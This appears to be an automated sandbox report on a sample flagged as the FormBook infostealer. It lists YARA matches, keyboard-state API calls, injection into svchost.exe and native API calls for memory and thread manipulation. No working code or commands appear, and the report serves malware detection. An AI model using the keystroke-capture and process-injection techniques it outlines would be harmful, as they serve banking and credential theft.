Code function: 0_2_00830219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00830219

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_0085CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0085CDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2167106350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4479572760.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4476573595.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2168438536.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2168337085.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4477886533.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4477944173.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2233898775.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4477842256.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2167106350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4479572760.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4476573595.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2168438536.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2168337085.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4477886533.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4477944173.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2233898775.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4477842256.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: This is a third-party compiled AutoIt script.	0_2_007D3B4C
Source: Document TOP19928.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: Document TOP19928.exe, 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4b9cce53-8
Source: Document TOP19928.exe, 00000000.00000002.2013315930.0000000000885000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_214792a4-7
Source: name.exe, 00000002.00000002.2028925844.0000000000885000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a31ef368-e
Source: name.exe, 00000002.00000002.2028925844.0000000000885000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b63d212b-d
Source: name.exe, 00000007.00000002.2177337737.0000000000885000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_81342c73-5
Source: name.exe, 00000007.00000002.2177337737.0000000000885000.00000040.00000001.01000000.00000004.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_522da5a6-2

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Document TOP19928.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007D3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	0_2_007D3633
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085C220 NtdllDialogWndProc_W,	0_2_0085C220
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085C27C ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	0_2_0085C27C
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085C49C PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	0_2_0085C49C
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085C788 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	0_2_0085C788
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085C8EE DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	0_2_0085C8EE
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085C86D SendMessageW,NtdllDialogWndProc_W,	0_2_0085C86D
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085CBAE NtdllDialogWndProc_W,	0_2_0085CBAE
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085CBF9 NtdllDialogWndProc_W,	0_2_0085CBF9
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085CB50 NtdllDialogWndProc_W,	0_2_0085CB50
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085CB7F NtdllDialogWndProc_W,	0_2_0085CB7F
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085CC2E ClientToScreen,NtdllDialogWndProc_W,	0_2_0085CC2E
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085CDAC NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,	0_2_0085CDAC
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085CD6C GetWindowLongW,NtdllDialogWndProc_W,	0_2_0085CD6C
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007D1290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	0_2_007D1290
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007D1287 NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,	0_2_007D1287
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007D167D NtdllDialogWndProc_W,	0_2_007D167D
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085D6C6 NtdllDialogWndProc_W,	0_2_0085D6C6
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007D16DE GetParent,NtdllDialogWndProc_W,	0_2_007D16DE
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007D16B5 NtdllDialogWndProc_W,	0_2_007D16B5
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085D74C GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,	0_2_0085D74C
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007D189B NtdllDialogWndProc_W,	0_2_007D189B
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085DA9A NtdllDialogWndProc_W,	0_2_0085DA9A
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085BF4D NtdllDialogWndProc_W,CallWindowProcW,	0_2_0085BF4D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0042B363 NtClose,	3_2_0042B363
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472B60 NtClose,LdrInitializeThunk,	3_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034735C0 NtCreateMutant,LdrInitializeThunk,	3_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03474340 NtSetContextThread,	3_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03474650 NtSuspendThread,	3_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472BE0 NtQueryValueKey,	3_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472BF0 NtAllocateVirtualMemory,	3_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472B80 NtQueryInformationFile,	3_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472BA0 NtEnumerateValueKey,	3_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472AD0 NtReadFile,	3_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472AF0 NtWriteFile,	3_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472AB0 NtWaitForSingleObject,	3_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472F60 NtCreateProcessEx,	3_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472F30 NtCreateSection,	3_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472FE0 NtCreateFile,	3_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472F90 NtProtectVirtualMemory,	3_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472FA0 NtQuerySection,	3_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472FB0 NtResumeThread,	3_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472E30 NtWriteVirtualMemory,	3_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472EE0 NtQueueApcThread,	3_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472E80 NtReadVirtualMemory,	3_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472EA0 NtAdjustPrivilegesToken,	3_2_03472EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472D00 NtSetInformationFile,	3_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472D10 NtMapViewOfSection,	3_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472D30 NtUnmapViewOfSection,	3_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472DD0 NtDelayExecution,	3_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472DB0 NtEnumerateKey,	3_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472C60 NtCreateKey,	3_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472C00 NtQueryInformationProcess,	3_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472CC0 NtQueryVirtualMemory,	3_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472CF0 NtOpenProcess,	3_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03472CA0 NtQueryInformationToken,	3_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03473010 NtOpenDirectoryObject,	3_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03473090 NtSetValueKey,	3_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034739B0 NtGetContextThread,	3_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03473D70 NtOpenThread,	3_2_03473D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03473D10 NtOpenProcessToken,	3_2_03473D10

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_008340B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_008340B1

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_00828858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74765590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

0_2_00828858

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_0083545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0083545F

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007DE800	0_2_007DE800
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007FDBB5	0_2_007FDBB5
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007DE060	0_2_007DE060
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0085804A	0_2_0085804A
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007E4140	0_2_007E4140
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007F2405	0_2_007F2405
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00806522	0_2_00806522
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00850665	0_2_00850665
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0080267E	0_2_0080267E
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007E6843	0_2_007E6843
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007F283A	0_2_007F283A
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_008089DF	0_2_008089DF
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00806A94	0_2_00806A94
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00850AE2	0_2_00850AE2
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007E8A0E	0_2_007E8A0E
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_0082EB07	0_2_0082EB07
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00838B13	0_2_00838B13
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007FCD61	0_2_007FCD61
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00807006	0_2_00807006
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007E710E	0_2_007E710E
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007E3190	0_2_007E3190
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007D1287	0_2_007D1287
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007F33C7	0_2_007F33C7
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007FF419	0_2_007FF419
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007F16C4	0_2_007F16C4
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007E5680	0_2_007E5680
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007F78D3	0_2_007F78D3
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007E58C0	0_2_007E58C0
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007F1BB8	0_2_007F1BB8
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00809D05	0_2_00809D05
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007DFE40	0_2_007DFE40
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007FBFE6	0_2_007FBFE6
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_007F1FD0	0_2_007F1FD0
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00EE3630	0_2_00EE3630
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_03A53630	2_2_03A53630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00416871	3_2_00416871
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00416873	3_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004028A0	3_2_004028A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00410173	3_2_00410173
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00401110	3_2_00401110
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040E1F3	3_2_0040E1F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00401290	3_2_00401290
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00403500	3_2_00403500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040268A	3_2_0040268A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00402698	3_2_00402698
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_004026A0	3_2_004026A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040FF4A	3_2_0040FF4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0042D753	3_2_0042D753
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040FF53	3_2_0040FF53
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FA352	3_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344E3F0	3_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_035003E6	3_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0274	3_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C02C0	3_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034C8158	3_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03430100	3_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DA118	3_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F81CC	3_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F41A2	3_2_034F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_035001AA	3_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D2000	3_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03464750	3_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440770	3_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343C7C0	3_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345C6E0	3_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440535	3_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03500591	3_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F2446	3_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E4420	3_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034EE4F6	3_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FAB40	3_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F6BD7	3_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343EA80	3_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03456962	3_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034429A0	3_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0350A9A6	3_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344A840	3_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03442840	3_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0346E8F0	3_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034268B8	3_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B4F40	3_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03482F28	3_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03460F30	3_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E2F30	3_2_034E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03432FC8	3_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344CFE0	3_2_0344CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034BEFA0	3_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440E59	3_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FEE26	3_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FEEDB	3_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03452E90	3_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FCE93	3_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344AD00	3_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DCD1F	3_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0343ADE0	3_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03458DBF	3_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03440C00	3_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03430CF2	3_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E0CB5	3_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342D34C	3_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F132D	3_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0348739A	3_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345B2C0	3_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E12ED	3_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034452A0	3_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0347516C	3_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0342F172	3_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0350B16B	3_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0344B1B0	3_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034EF0CC	3_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034470C0	3_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F70E9	3_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FF0E0	3_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FF7B0	3_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F16CC	3_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F7571	3_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DD5B0	3_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03431460	3_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FF43F	3_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FFB76	3_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B5BF0	3_2_034B5BF0
